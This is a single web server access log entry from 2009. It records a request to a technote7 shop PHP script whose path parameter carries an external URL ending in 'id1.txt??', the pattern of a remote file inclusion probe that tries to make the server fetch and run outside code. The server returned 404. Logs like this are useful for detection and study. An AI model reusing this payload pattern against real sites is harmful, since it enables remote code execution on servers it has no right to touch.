203.94.155.59 - - [19/Jun/2009:01:45:41 -0400] "GET /logs/access_log.Q109060500/technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
